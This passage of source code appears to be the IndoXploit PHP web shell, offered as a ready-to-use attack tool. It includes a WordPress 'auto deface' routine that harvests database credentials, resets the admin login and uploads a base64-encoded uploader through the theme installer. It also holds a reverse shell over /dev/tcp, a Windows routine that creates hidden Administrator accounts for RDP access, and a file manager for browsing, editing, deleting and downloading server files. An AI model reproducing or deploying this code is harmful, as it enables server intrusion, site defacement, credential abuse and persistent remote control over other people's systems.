  1332. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1333. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1334. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1335. curl_setopt($ch, CURLOPT_POST, 1);
  1336. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1337. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1338. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1339. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1340. $data = curl_exec($ch);
  1341. curl_close($ch);
  1342. return $data;
  1343. }
  1344. $link = explode("\r\n", $_POST['link']);
  1345. $script = htmlspecialchars($_POST['script']);
  1346. $user = "indoxploit";
  1347. $pass = "indoxploit";
  1348. $passx = md5($pass);
  1349. foreach($link as $dir_config) {
  1350. $config = anucurl($dir_config);
  1351. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1352. $dbuser = ambilkata($config,"DB_USER', '","'");
  1353. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1354. $dbname = ambilkata($config,"DB_NAME', '","'");
  1355. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1356. $prefix = $dbprefix."users";
  1357. $option = $dbprefix."options";
  1358. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1359. $db = mysql_select_db($dbname);
  1360. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1361. $result = mysql_fetch_array($q);
  1362. $id = $result[ID];
  1363. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1364. $result2 = mysql_fetch_array($q2);
  1365. $target = $result2[option_value];
  1366. if($target == '') {
  1367. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1368. } else {
  1369. echo "[+] $target <br>";
  1370. }
  1371. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1372. if(!$conn OR !$db OR !$update) {
  1373. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1374. mysql_close($conn);
  1375. } else {
  1376. $site = "$target/wp-login.php";
  1377. $site2 = "$target/wp-admin/theme-install.php?upload";
  1378. $b1 = anucurl($site2);
  1379. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1380. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1381. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1382. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1383. $www = "m.php";
  1384. $fp5 = fopen($www,"w");
  1385. fputs($fp5,$upload3);
  1386. $post2 = array(
  1387. "_wpnonce" => "$anu2",
  1388. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1389. "themezip" => "@$www",
  1390. "install-theme-submit" => "Install Now",
  1391. );
  1392. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1393. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1394. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1395. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1396. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1397. curl_setopt($ch, CURLOPT_POST, 1);
  1398. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1399. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1400. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1401. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1402. $data3 = curl_exec($ch);
  1403. curl_close($ch);
  1404. $y = date("Y");
  1405. $m = date("m");
  1406. $namafile = "id.php";
  1407. $fpi = fopen($namafile,"w");
  1408. fputs($fpi,$script);
  1409. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1410. curl_setopt($ch6, CURLOPT_POST, true);
  1411. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1412. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1413. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1414. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1415. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1416. $postResult = curl_exec($ch6);
  1417. curl_close($ch6);
  1418. $as = "$target/k.php";
  1419. $bs = anucurl($as);
  1420. if(preg_match("#$script#is", $bs)) {
  1421. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1422. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1423. } else {
  1424. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1425. echo "[!!] coba aja manual: <br>";
  1426. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1427. echo "[+] username: <font color=lime>$user</font><br>";
  1428. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1429. }
  1430. mysql_close($conn);
  1431. }
  1432. }
  1433. } else {
  1434. echo "<center><h1>WordPress Auto Deface V.2</h1>
  1435. <form method='post'>
  1436. Link Config: <br>
  1437. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  1438. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1439. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1440. </form></center>";
  1441. }
  1442. } elseif($_GET['do'] == 'network') {
  1443. echo "<center><form method='post'>
  1444. Back Connect: <br>
  1445. <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'><br>
  1446. <input type='text' placeholder='port' name='port_bc' value='6969'><br>
  1447. <input type='submit' name='sub_bc' value='Reverse' style='width: 210px;'>
  1448. </form>";
  1449. if(isset($_POST['sub_bc'])) {
  1450. $ip = $_POST['ip_bc'];
  1451. $port = $_POST['port_bc'];
  1452. exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
  1453. }
  1454. echo "</center>";
  1455. } elseif($_GET['do'] == 'krdp_shell') {
  1456. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1457. if($_POST['create']) {
  1458. $user = htmlspecialchars($_POST['user']);
  1459. $pass = htmlspecialchars($_POST['pass']);
  1460. if(preg_match("/$user/", exe("net user"))) {
  1461. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  1462. } else {
  1463. $add_user = exe("net user $user $pass /add");
  1464. $add_groups1 = exe("net localgroup Administrators $user /add");
  1465. $add_groups2 = exe("net localgroup Administrator $user /add");
  1466. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1467. echo "[ RDP ACCOUNT INFO ]<br>
  1468. ------------------------------<br>
  1469. IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
  1470. Username: <font color=lime>$user</font><br>
  1471. Password: <font color=lime>$pass</font><br>
  1472. ------------------------------<br><br>
  1473. [ STATUS ]<br>
  1474. ------------------------------<br>
  1475. ";
  1476. if($add_user) {
  1477. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  1478. } else {
  1479. echo "[add user] -> <font color='red'>Gagal</font><br>";
  1480. }
  1481. if($add_groups1) {
  1482. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  1483. } elseif($add_groups2) {
  1484. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  1485. } elseif($add_groups3) {
  1486. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  1487. } else {
  1488. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1489. }
  1490. echo "------------------------------<br>";
  1491. }
  1492. } elseif($_POST['s_opsi']) {
  1493. $user = htmlspecialchars($_POST['r_user']);
  1494. if($_POST['opsi'] == '1') {
  1495. $cek = exe("net user $user");
  1496. echo "Checking username <font color=lime>$user</font> ....... ";
  1497. if(preg_match("/$user/", $cek)) {
  1498. echo "[ <font color=lime>Sudah ada</font> ]<br>
  1499. ------------------------------<br><br>
  1500. <pre>$cek</pre>";
  1501. } else {
  1502. echo "[ <font color=red>belum ada</font> ]";
  1503. }
  1504. } elseif($_POST['opsi'] == '2') {
  1505. $cek = exe("net user $user indoxploit");
  1506. if(preg_match("/$user/", exe("net user"))) {
  1507. echo "[change password: <font color=lime>indoxploit</font>] -> ";
  1508. if($cek) {
  1509. echo "<font color=lime>Berhasil</font>";
  1510. } else {
  1511. echo "<font color=red>Gagal</font>";
  1512. }
  1513. } else {
  1514. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1515. }
  1516. } elseif($_POST['opsi'] == '3') {
  1517. $cek = exe("net user $user /DELETE");
  1518. if(preg_match("/$user/", exe("net user"))) {
  1519. echo "[remove user: <font color=lime>$user</font>] -> ";
  1520. if($cek) {
  1521. echo "<font color=lime>Berhasil</font>";
  1522. } else {
  1523. echo "<font color=red>Gagal</font>";
  1524. }
  1525. } else {
  1526. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1527. }
  1528. } else {
  1529. //
  1530. }
  1531. } else {
  1532. echo "-- Create RDP --<br>
  1533. <form method='post'>
  1534. <input type='text' name='user' placeholder='username' value='indoxploit' required>
  1535. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
  1536. <input type='submit' name='create' value='>>'>
  1537. </form>
  1538. -- Option --<br>
  1539. <form method='post'>
  1540. <input type='text' name='r_user' placeholder='username' required>
  1541. <select name='opsi'>
  1542. <option value='1'>Cek Username</option>
  1543. <option value='2'>Ubah Password</option>
  1544. <option value='3'>Hapus Username</option>
  1545. </select>
  1546. <input type='submit' name='s_opsi' value='>>'>
  1547. </form>
  1548. ";
  1549. }
  1550. } else {
  1551. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1552. }
  1553. } elseif($_GET['act'] == 'newfile') {
  1554. if($_POST['new_save_file']) {
  1555. $newfile = htmlspecialchars($_POST['newfile']);
  1556. $fopen = fopen($newfile, "a+");
  1557. if($fopen) {
  1558. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1559. } else {
  1560. $act = "<font color=red>permission denied</font>";
  1561. }
  1562. }
  1563. echo $act;
  1564. echo "<form method='post'>
  1565. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1566. <input type='submit' name='new_save_file' value='Submit'>
  1567. </form>";
  1568. } elseif($_GET['act'] == 'newfolder') {
  1569. if($_POST['new_save_folder']) {
  1570. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1571. if(!mkdir($new_folder)) {
  1572. $act = "<font color=red>permission denied</font>";
  1573. } else {
  1574. $act = "<script>window.location='?dir=".$dir."';</script>";
  1575. }
  1576. }
  1577. echo $act;
  1578. echo "<form method='post'>
  1579. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1580. <input type='submit' name='new_save_folder' value='Submit'>
  1581. </form>";
  1582. } elseif($_GET['act'] == 'rename_dir') {
  1583. if($_POST['dir_rename']) {
  1584. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1585. if($dir_rename) {
  1586. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1587. } else {
  1588. $act = "<font color=red>permission denied</font>";
  1589. }
  1590. echo "".$act."<br>";
  1591. }
  1592. echo "<form method='post'>
  1593. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1594. <input type='submit' name='dir_rename' value='rename'>
  1595. </form>";
  1596. } elseif($_GET['act'] == 'delete_dir') {
  1597. $delete_dir = rmdir($dir);
  1598. if($delete_dir) {
  1599. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1600. } else {
  1601. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1602. }
  1603. echo $act;
  1604. } elseif($_GET['act'] == 'view') {
  1605. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1606. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1607. } elseif($_GET['act'] == 'edit') {
  1608. if($_POST['save']) {
  1609. $save = file_put_contents($_GET['file'], $_POST['src']);
  1610. if($save) {
  1611. $act = "<font color=lime>Saved!</font>";
  1612. } else {
  1613. $act = "<font color=red>permission denied</font>";
  1614. }
  1615. echo "".$act."<br>";
  1616. }
  1617. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1618. echo "<form method='post'>
  1619. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1620. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1621. </form>";
  1622. } elseif($_GET['act'] == 'rename') {
  1623. if($_POST['do_rename']) {
  1624. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1625. if($rename) {
  1626. $act = "<script>window.location='?dir=".$dir."';</script>";
  1627. } else {
  1628. $act = "<font color=red>permission denied</font>";
  1629. }
  1630. echo "".$act."<br>";
  1631. }
  1632. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1633. echo "<form method='post'>
  1634. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1635. <input type='submit' name='do_rename' value='rename'>
  1636. </form>";
  1637. } elseif($_GET['act'] == 'delete') {
  1638. $delete = unlink($_GET['file']);
  1639. if($delete) {
  1640. $act = "<script>window.location='?dir=".$dir."';</script>";
  1641. } else {
  1642. $act = "<font color=red>permission denied</font>";
  1643. }
  1644. echo $act;
  1645. } elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  1646. @ob_clean();
  1647. $file = $_GET['file'];
  1648. @header('Content-Description: File Transfer');
  1649. @header('Content-Type: application/octet-stream');
  1650. @header('Content-Disposition: attachment; filename="'.basename($file).'"');
  1651. @header('Expires: 0');
  1652. @header('Cache-Control: must-revalidate');
  1653. @header('Pragma: public');
  1654. @header('Content-Length: ' . filesize($file));
  1655. readfile($file);
  1656. exit;
  1657. } else {
  1658. if(is_dir($dir) === true) {
  1659. if(!is_readable($dir)) {
  1660. echo "<font color=red>can't open directory. ( not readable )</font>";
  1661. } else {
  1662. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1663. <tr>
  1664. <th class="th_home"><center>Name</center></th>
  1665. <th class="th_home"><center>Type</center></th>
  1666. <th class="th_home"><center>Size</center></th>
  1667. <th class="th_home"><center>Last Modified</center></th>
  1668. <th class="th_home"><center>Owner/Group</center></th>
  1669. <th class="th_home"><center>Permission</center></th>
  1670. <th class="th_home"><center>Action</center></th>
  1671. </tr>';
  1672. $scandir = scandir($dir);
  1673. foreach($scandir as $dirx) {
  1674. $dtype = filetype("$dir/$dirx");
  1675. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1676. if(function_exists('posix_getpwuid')) {
  1677. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1678. $downer = $downer['name'];
  1679. } else {
  1680. //$downer = $uid;
  1681. $downer = fileowner("$dir/$dirx");
  1682. }
  1683. if(function_exists('posix_getgrgid')) {
  1684. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1685. $dgrp = $dgrp['name'];
  1686. } else {
  1687. $dgrp = filegroup("$dir/$dirx");
  1688. }
  1689. if(!is_dir("$dir/$dirx")) continue;
  1690. if($dirx === '..') {
  1691. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1692. } elseif($dirx === '.') {
  1693. $href = "<a href='?dir=$dir'>$dirx</a>";
  1694. } else {
  1695. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1696. }
  1697. if($dirx === '.' || $dirx === '..') {
  1698. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1699. } else {
  1700. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1701. }
  1702. echo "<tr>";
  1703. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1704. echo "<td class='td_home'><center>$dtype</center></td>";
  1705. echo "<td class='td_home'><center>-</center></th></td>";
  1706. echo "<td class='td_home'><center>$dtime</center></td>";
  1707. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1708. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1709. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1710. echo "</tr>";
  1711. }
  1712. }
  1713. } else {
  1714. echo "<font color=red>can't open directory.</font>";
  1715. }
  1716. foreach($scandir as $file) {
  1717. $ftype = filetype("$dir/$file");
  1718. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1719. $size = filesize("$dir/$file")/1024;
  1720. $size = round($size,3);
  1721. if(function_exists('posix_getpwuid')) {
  1722. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1723. $fowner = $fowner['name'];
  1724. } else {
  1725. //$downer = $uid;
  1726. $fowner = fileowner("$dir/$file");
  1727. }
  1728. if(function_exists('posix_getgrgid')) {
  1729. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1730. $fgrp = $fgrp['name'];
  1731. } else {
  1732. $fgrp = filegroup("$dir/$file");
  1733. }
  1734. if($size > 1024) {
  1735. $size = round($size/1024,2). 'MB';
  1736. } else {
  1737. $size = $size. 'KB';
  1738. }
  1739. if(!is_file("$dir/$file")) continue;
  1740. echo "<tr>";
  1741. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1742. echo "<td class='td_home'><center>$ftype</center></td>";
  1743. echo "<td class='td_home'><center>$size</center></td>";
  1744. echo "<td class='td_home'><center>$ftime</center></td>";
  1745. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1746. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1747. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1748. echo "</tr>";
  1749. }
  1750. echo "</table>";
  1751. if(!is_readable($dir)) {
  1752. //
  1753. } else {
  1754. echo "<hr>";
  1755. }
  1756. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://blog.indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a></center>";
  1757. }
  1758. ?>
  1759. </html>
Add Comment
Please, Sign In to add comment